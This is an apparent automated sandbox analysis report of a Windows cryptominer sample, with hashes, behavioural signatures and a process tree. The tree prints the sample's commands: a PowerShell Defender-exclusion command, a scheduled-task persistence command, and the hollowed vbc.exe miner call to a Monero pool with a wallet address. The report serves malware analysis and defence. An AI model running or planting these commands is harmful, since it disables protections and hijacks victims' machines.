Resubmissions
06/03/2024, 22:46
240306-2pzx2abc39 723/12/2022, 20:25
221223-y7mhwahb34 1023/12/2022, 20:11
221223-yx8ncscc9x 1023/12/2022, 20:03
221223-ys7v9sha97 10Analysis
-
max time kernel
652s -
max time network
654s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
23/12/2022, 20:11
Static task
static1
Behavioral task
behavioral1
Sample
896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe
Resource
win7-20221111-en
Errors
General
-
Target
896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe
-
Size
2.1MB
-
MD5
55a350a007f6943a7e09f4abfdfa6979
-
SHA1
c94e84ddbb6f525cfa675791c7f2d9b36d28a3ef
-
SHA256
896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80
-
SHA512
707269690787a70980cfc2658592cef762503ce7228fdfa56f5d584552327d28e338cc877fb37b1414f451a9c05a05fe3e134bc0197563a266fd62ab539bdc16
-
SSDEEP
49152:yMkkwgEEIRmnl1DVHYYhdxiUFZ4l7jl1nUI3gg+cnIFPsxdgyg:yDkfRX4UTDennUI3gvcIlRz
Malware Config
Signatures
-
XMRig Miner payload 9 IoCs
resource yara_rule behavioral2/memory/1704-159-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/1704-160-0x0000000140343234-mapping.dmp xmrig behavioral2/memory/1704-161-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/1704-162-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/1704-164-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/1704-166-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/1704-171-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/3012-305-0x0000000140343234-mapping.dmp xmrig behavioral2/memory/4764-343-0x0000000140343234-mapping.dmp xmrig -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 4432 set thread context of 1704 4432 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 91 PID 984 set thread context of 3012 984 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 118 PID 4504 set thread context of 4764 4504 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 129 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 492 schtasks.exe 3552 schtasks.exe 2244 schtasks.exe -
Modifies data under HKEY_USERS 15 IoCs
description ioc Process Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "182" LogonUI.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings taskmgr.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2840 powershell.exe 2840 powershell.exe 4432 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4888 taskmgr.exe -
Suspicious behavior: LoadsDriver 3 IoCs
pid Process 672 Process not Found 672 Process not Found 672 Process not Found -
Suspicious use of AdjustPrivilegeToken 20 IoCs
description pid Process Token: SeDebugPrivilege 4432 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe Token: SeDebugPrivilege 2840 powershell.exe Token: SeDebugPrivilege 4888 taskmgr.exe Token: SeSystemProfilePrivilege 4888 taskmgr.exe Token: SeCreateGlobalPrivilege 4888 taskmgr.exe Token: SeLockMemoryPrivilege 1704 vbc.exe Token: SeLockMemoryPrivilege 1704 vbc.exe Token: SeDebugPrivilege 4116 powershell.exe Token: SeDebugPrivilege 4508 powershell.exe Token: SeDebugPrivilege 984 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe Token: SeDebugPrivilege 3268 powershell.exe Token: SeDebugPrivilege 3844 powershell.exe Token: SeDebugPrivilege 1648 powershell.exe Token: SeDebugPrivilege 2884 powershell.exe Token: SeLockMemoryPrivilege 3012 vbc.exe Token: SeLockMemoryPrivilege 3012 vbc.exe Token: SeDebugPrivilege 4504 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe Token: SeDebugPrivilege 2340 powershell.exe Token: SeLockMemoryPrivilege 4764 vbc.exe Token: SeLockMemoryPrivilege 4764 vbc.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 1704 vbc.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe 4888 taskmgr.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2604 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4432 wrote to memory of 2840 4432 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 76 PID 4432 wrote to memory of 2840 4432 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 76 PID 4432 wrote to memory of 4528 4432 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 84 PID 4432 wrote to memory of 4528 4432 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 84 PID 4528 wrote to memory of 492 4528 cmd.exe 86 PID 4528 wrote to memory of 492 4528 cmd.exe 86 PID 4432 wrote to memory of 1704 4432 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 91 PID 4432 wrote to memory of 1704 4432 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 91 PID 4432 wrote to memory of 1704 4432 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 91 PID 4432 wrote to memory of 1704 4432 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 91 PID 4432 wrote to memory of 1704 4432 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 91 PID 4432 wrote to memory of 1704 4432 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 91 PID 4432 wrote to memory of 1704 4432 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 91 PID 4432 wrote to memory of 1704 4432 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 91 PID 4432 wrote to memory of 1704 4432 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 91 PID 4432 wrote to memory of 1704 4432 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 91 PID 4432 wrote to memory of 1704 4432 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 91 PID 4432 wrote to memory of 1704 4432 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 91 PID 4432 wrote to memory of 1704 4432 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 91 PID 4432 wrote to memory of 1704 4432 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 91 PID 4948 wrote to memory of 4116 4948 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 95 PID 4948 wrote to memory of 4116 4948 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 95 PID 2684 wrote to memory of 4508 2684 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 100 PID 2684 wrote to memory of 4508 2684 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 100 PID 984 wrote to memory of 3268 984 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 117 PID 984 wrote to memory of 3268 984 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 117 PID 984 wrote to memory of 372 984 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 107 PID 984 wrote to memory of 372 984 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 107 PID 3716 wrote to memory of 3844 3716 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 109 PID 3716 wrote to memory of 3844 3716 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 109 PID 1680 wrote to memory of 1648 1680 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 111 PID 1680 wrote to memory of 1648 1680 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 111 PID 392 wrote to memory of 2884 392 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 115 PID 392 wrote to memory of 2884 392 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 115 PID 372 wrote to memory of 3552 372 cmd.exe 114 PID 372 wrote to memory of 3552 372 cmd.exe 114 PID 984 wrote to memory of 3012 984 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 118 PID 984 wrote to memory of 3012 984 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 118 PID 984 wrote to memory of 3012 984 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 118 PID 984 wrote to memory of 3012 984 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 118 PID 984 wrote to memory of 3012 984 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 118 PID 984 wrote to memory of 3012 984 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 118 PID 984 wrote to memory of 3012 984 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 118 PID 984 wrote to memory of 3012 984 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 118 PID 984 wrote to memory of 3012 984 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 118 PID 984 wrote to memory of 3012 984 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 118 PID 984 wrote to memory of 3012 984 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 118 PID 984 wrote to memory of 3012 984 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 118 PID 984 wrote to memory of 3012 984 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 118 PID 984 wrote to memory of 3012 984 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 118 PID 4504 wrote to memory of 2340 4504 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 123 PID 4504 wrote to memory of 2340 4504 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 123 PID 4504 wrote to memory of 4332 4504 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 125 PID 4504 wrote to memory of 4332 4504 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 125 PID 4332 wrote to memory of 2244 4332 cmd.exe 128 PID 4332 wrote to memory of 2244 4332 cmd.exe 128 PID 4504 wrote to memory of 4764 4504 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 129 PID 4504 wrote to memory of 4764 4504 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 129 PID 4504 wrote to memory of 4764 4504 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 129 PID 4504 wrote to memory of 4764 4504 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 129 PID 4504 wrote to memory of 4764 4504 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 129 PID 4504 wrote to memory of 4764 4504 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 129 PID 4504 wrote to memory of 4764 4504 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 129 PID 4504 wrote to memory of 4764 4504 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 129
Processes
-
C:\Users\Admin\AppData\Local\Temp\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"C:\Users\Admin\AppData\Local\Temp\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4432 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2840
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:4528 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"3⤵
- Creates scheduled task(s)
PID:492
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1704
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4888
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1564
-
C:\Users\Admin\AppData\Local\Temp\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"C:\Users\Admin\AppData\Local\Temp\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4948 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4116
-
-
C:\Users\Admin\Desktop\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"C:\Users\Admin\Desktop\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4508
-
-
C:\Users\Admin\Desktop\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"C:\Users\Admin\Desktop\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:984 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:372 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"3⤵
- Creates scheduled task(s)
PID:3552
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3268
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3012
-
-
C:\Users\Admin\Desktop\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"C:\Users\Admin\Desktop\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3716 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3844
-
-
C:\Users\Admin\Desktop\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"C:\Users\Admin\Desktop\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1680 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1648
-
-
C:\Users\Admin\Desktop\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"C:\Users\Admin\Desktop\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:392 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2884
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"1⤵PID:3412
-
C:\Users\Admin\Desktop\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"C:\Users\Admin\Desktop\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4504 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2340
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:4332 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"3⤵
- Creates scheduled task(s)
PID:2244
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4764
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa39bf855 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2604
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding1⤵PID:3752
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding1⤵PID:1240
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.1MB
MD5a3d7148655137e92c28b33e48d088088
SHA1bc98804abf481e58c925a0810c519c6c5f2d3ac0
SHA2565b0bfb92bb76a12c69669a08ef723377b9eaaf50eab6fe83b4c3f21d593f998f
SHA512ca131ce06bc6cbd47a58cc11f80a4db576effa3325f11222123fd6829589f29f894834679e09c3e50a50ef8019325d1a6fffab07d49fda43179a544ea4697373
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe.log
Filesize660B
MD51c5e1d0ff3381486370760b0f2eb656b
SHA1f9df6be8804ef611063f1ff277e323b1215372de
SHA256f424c891fbc7385e9826beed2dd8755aeac5495744b5de0a1e370891a7beaf7a
